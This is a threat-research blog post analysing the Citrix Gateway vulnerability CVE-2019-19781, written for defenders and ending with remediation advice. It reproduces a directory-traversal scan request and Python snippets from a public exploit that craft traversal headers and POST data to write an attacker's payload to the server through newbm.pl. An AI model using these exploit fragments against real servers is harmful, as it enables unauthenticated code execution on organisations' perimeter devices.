Blog Post

Citrix Gateway Vulnerability (CVE-2019-19781) Analysis

Executive Summary

On January 7th, SANS published a notification reporting uptick in scanning activity for versions of Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) vulnerable to CVE-2019-19781. This vulnerability was disclosed by Citrix ( CTX267027 ) on December 19th, and if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

Between January 7th and January 11th, the Awake Threat Research team noticed an uptick in scanning activity trying to discover vulnerable Citrix servers across many environments. However, this was not followed by any exploitation and the activity stopped after discovery. Since January 11th, multiple variants of exploit code have been published and we believe we will see active exploitation of the devices identified as vulnerable by the scanning activity.

Technical Detail

Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) are vulnerable to a Directory Traversal attack that can be exploited by an attacker to access files and directories outside of web folder. This has been used to scan and enumerate vulnerable servers as seen in this recent example:

Figure 1: Awake detecting Citrix Directory Traversal attack from an IP address in China

To exploit this directory traversal vulnerability we noticed scan activity with the following URI clearly an attempt at an absolute file reference using dot-dot-slash.

GET /vpn/../vpns/cfg/smb.conf HTTP/1.1

Figure 2: Directory path traversal seen in scanning activity

CVE-2019-19781 can be exploited by attackers to access configuration or other critical files in other directories (e.g. smb.conf in the example above).

Exploitability

Citrix Gateway is a customer-managed solution that is typically deployed on-premise or in the cloud to provide secure-access and single-sign on to another line of business applications. Citrix Gateways are therefore typically installed at the perimeter of the organizations’ network and are therefore directly accessible from the internet and wide open to this type of exploitation. Given the associated risk, CVE-2019-19781 has been assigned a CVSS risk score of 9.8 Critical.

Searching Shodan, the Awake Threat Research team was able to discover approximately forty thousand internet-accessible Citrix gateways.

Figure 3: Shodan results for internet accessible Citrix servers.

Remote Code Execution

On January 11th, new Github projects were released to exploit this vulnerability to read sensitive files and importantly then run arbitrary code on the vulnerable servers. The exploit code typically runs in a two-step process. First discovering vulnerable servers using directory traversal.

req = requests.get("https://%s:%s/vpn/../vpns/cfg/smb.conf" % (target,targetport), verify=False, timeout=2)

Figure 4: HTTP request to scan for Vulnerable Citrix Gateways

If the responding Citrix server is found to be vulnerable, the directory traversal vulnerability is used to call an existing “newbm.pl” Perl script with specially crafted http-headers and post-data that write the attacker’s code to the file system which can then be invoked to run arbitrary code on the vulnerable server. The Github code analyzed by Awake Threat Research Team drops a Netcat listener by default but this payload can be easily changed to a web-shell, etc. as seen fit by the attacker.

headers = ({
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
'NSC_NONCE' : '%s' % (nonce),
})
data = ({
"url" : "127.0.0.1",
"title" : payload,
"desc" : "desc",
"UI_inuse" : "a"
})

Figure 5: HTTP header and POST data built to drop an attacker’s payload

url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
req = requests.post(url, data=data, headers=headers, verify=False)

Figure 6: Existing Perl file on Citrix Gateways exploited to drop payload

Recommendation

As explained in technical details, exploiting Citrix Gateways vulnerable to CVE-2019-19781 is trivial and current scanning activity indicates that attackers are actively pursuing this.

While Citrix hasn’t released an official patch for this vulnerability, they have listed remediation steps in CTX267679 that can be taken immediately to protect from exploitation. These remediation steps will block all URL requests with directory traversal ( /../ ) and return with HTTP 403 Forbidden Error code. In addition, organizations should monitor access logs for directory traversal attempts. Any web application firewall capabilities available to the organization should be turned on to protect the vulnerable devices.

Param Singh
Param Singh

VP, Threat Research